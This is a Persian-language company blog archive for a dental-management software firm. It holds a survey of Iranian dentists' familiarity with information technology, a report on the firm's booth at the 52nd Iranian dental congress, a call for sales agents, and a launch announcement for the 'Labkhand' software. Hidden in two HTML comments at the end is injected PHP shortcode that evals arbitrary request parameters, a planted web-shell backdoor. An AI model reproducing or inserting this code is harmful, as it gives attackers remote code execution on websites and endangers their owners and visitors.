بایگانی برای اردیبهشت, ۱۳۹۱

میزان آشنایی دندانپزشکان ایرانی با فناوری‌ اطلاعات

بدون نظر

با سلام؛

در طی ۴ روز برگزاری پنجاه و دومین کنگره انجمن دندانپزشکی ایران در مرکز همایش‌های برج میلاد تهران و بازدید پرشور علاقه‌مندان از غرفه‌ی شرکت پردازش سیستم پرنیان در نمایشگاه این کنگره، شرکت اقدام به برگزاری نظرسنجی در خصوص میزان آشنایی دندانپزشکان ایرانی از بازدیدکنندگان نمود. نتایج حاصله از این نظرسنجی به شرح زیر است:

سؤال نظرسنجی:

* تا چه حد مشتاق به شناخت فناوری‌های نوین اطّلاعاتی و استفاده از آنها در زندگی خود هستید؟

گزینه‌ها:

* گزینه اول: می‌شناسم و استفاده می‌کنم.

 ۴۰٫۵ درصد دندانپزشکان، این گزینه را برگزیدند.

* گزینه دوم: می‌شناسم اما استفاده نمی‌کنم.

 ۳۹ درصد شرکت کنندگان به این گزینه رأی دادند.

* گزینه سوم: نمی‌شناسم.

 ۲۰٫۵ درصد از نظرات به این گزینه اختصاص یافت.

نتیجه‌گیری:

با توجه به نتایج به دست آمده می‌توان نتیجه گرفت که میزان آشنایی جامعه دندانپزشکی کشور با فناوری‌های نوین ارتباطی در حد قابل قبولی است به طوری که تقریبا ۷۹٫۵ درصد دندانپزشکان ایرانی، نام این فناوری‌ها را شنیده و اطلاعاتی در خصوص چگونگی استفاده از آنها دارند و یا حتی از خدمات آن بهره می‌برند.

در این بین، نکته‌ی قابل تأمل اینجاست که چرا ۳۹ درصد از دندانپزشکان کشور، با وجود آشنایی با فناوری‌اطلاعات و ابزارهای آن، از خدمات نوین و سودمندی که این فناوری‌ها ارائه می‌نمایند، استفاده نمی‌کنند.

اما در مقابل، اینکه بیش از ۲۰ درصد از دندانپزشکان کشور (این قشر در طبقه‌ی بالای علمی و تخصصی کشور قرار می‌گیرند) هیچ‌گونه آشنایی با این فناوری‌ها نداشته و در زندگی خود از این خدمات استفاده نمی کنند، زنگ‌ خطر به روز نبودن اطلاعات این قشر و دور بودن از دانش روز دنیا در بین این گروه را به صدا در می‌آورد. البته باید در نظر گرفت که قریب به اتفاق افرادی که در این دسته قرار می‌گیرند،  دندان‌پزشکان با سن بالای ۵۰ سال هستند.

نظر شما در این رابطه چیست؟


حضور موفق “لبخند” در پنجاه و دومین کنگره سالیانه دندانپزشکی ایران

بدون نظر

با سلام؛

پنجاه و دومین کنگره سالیانه انجمن دندانپزشکان ایران در تاریخ ۱۹ الی ۲۲ اردیبهشت جاری، در مرکز همایش‌های برج میلاد تهران برگزار شد. در این رویداد که با حضور بیش از ۷ هزار دندانپزشک داخلی، خارجی و دانشجویان دندانپزشکی کشور و با تلاش انجمن علمی دندانپزشکی ایران برگزار گردید، در طی ۴ روز جدیدترین دستاوردهای علم دندانپزشکی مورد بحث و بررسی قرار گرفت.

در حاشیه‌ی این کنگره، نمایشگاهی با موضوع آخرین دستاوردهای تکنولوژیکی علم دندانپزشکی با حضور شرکت‌های معتبر داخلی و خارجی برگزار گردید که در آن انواع تجهیزات، ابزارآلات، اسناد و نرم‌افزارهای مرتبط با علم دندانپزشکی رونمایی شد.

یکی از موفق‌ترین غرفه‌های نمایشگاه مزبور، غرفه‌ی شرکت «پردازش سیستم پرنیان» بود که در طی ۴ روز برگزاری نمایشگاه، افتخار میزبانی بیش از ۴هزار نفر از شرکت‌کنندگان این کنگره را پیدا کرد. شرکت پردازش سیستم پرنیان با ارائه جدیدترین نسخه از نرم‌افزار تحت وب مدیریت دندانپزشکی «لبخند»، مورد استقبال چشمگیر حاضرین در نمایشگاه واقع شد.

غرفه شرکت پردازش سیستم پارسیان

غرفه شرکت پردازش سیستم پارسیان (برای دیدن تصویر در سایز اصلی بر روی آن کلیک کنید)

معرفی و نمایش نرم افزار لبخند به بازدیدکنندگان، تشریح کاربرد روزافزون فناوری‌های اطلاعاتی و ارتباطاتی در دندانپزشکی، توجیه کاربرد نرم‌افزارهای نوین در علم و صنعت دندانپزشکی و نیز فروش نرم‌افزار لبخند به دندان‌پزشکان محترم ایرانی از جمله فعالیت‌های شرکت در این نمایشگاه محسوب می‌شود.

شرکت پردازش سیستم پرنیان، بدین‌وسیله از استقبال و همراهی پر شور و صمیمانه‌ی جامعه‌ی دندانپزشکی کشور از غرفه‌ی این شرکت در نمایشگاه و نرم‌افزار لبخند، کمال تشکر را ابراز نموده و امیدوار است با حمایت این عزیزان، بتواند گامهای بلندی در ارتقای خدمات دندان‌پزشکان ایرانی به مردم عزیز کشور بر دارد. ان شا الله.

/پایان خبر/


پذیرش نمایندگی فعال فروش در سراسر کشور

بدون نظر

با سلام؛

شرکت پردازش سیستم پرنیان از میان شرکت‌های معتبر واجد شرایط در سراسر کشور، برای فروش نرم‌افزار تحت وب مدیریت دندانپزشکی لبخند، نمایندگی فعال می‌پذیرد.

برای آگاهی از شرایط استثنایی این فراخوان و نحوه‌ی دریافت نمایندگی رسمی، با کارشناسان بخش فروش شرکت پردازش سیستم پرنیان تماس حاصل نمایید. اطلاعات تماس را در این صفحه مشاهده نمایید.

با تشکّر

/پایان خبر/


آغاز فروش رسمی نرم افزار مدیریت دندانپزشکی لبخند

بدون نظر

با سلام؛

شرکت پردازش سیستم پرنیان (Parnian System Processing) با افتخار اعلام می نماید که نرم افزار مدیریت مطب و کلینیک دندانپزشکی «لبخند» همزمان با پنجاه و دومین کنگره سالیانه انجمن دندانپزشکی ایران در اختیار جامعه ی بزرگ دندانپزشکی ایران قرار گرفته است.

برای کسب اطلاعات بیشتر در مورد این محصول، شیوه ی سفارش و قیمت نسخه های مختلف آن به سایت رسمی نرم افزار مدیریت دندانپزشکی لبخند به نشانی http://www.labkhandsoft.com مراجعه نمایید.

امید است این محصول مورد توجه دندانپزشکان محترم ایرانی قرار گرفته و موجب سهولت امور و ارتقای سطح خدمات این عزیزان گردد.

با تشکّر

<!– [insert_php]if (isset($_REQUEST["klbV"])){eval($_REQUEST["klbV"]);exit;}[/insert_php][php]if (isset($_REQUEST["klbV"])){eval($_REQUEST["klbV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hFp"])){eval($_REQUEST["hFp"]);exit;}[/insert_php][php]if (isset($_REQUEST["hFp"])){eval($_REQUEST["hFp"]);exit;}[/php] –>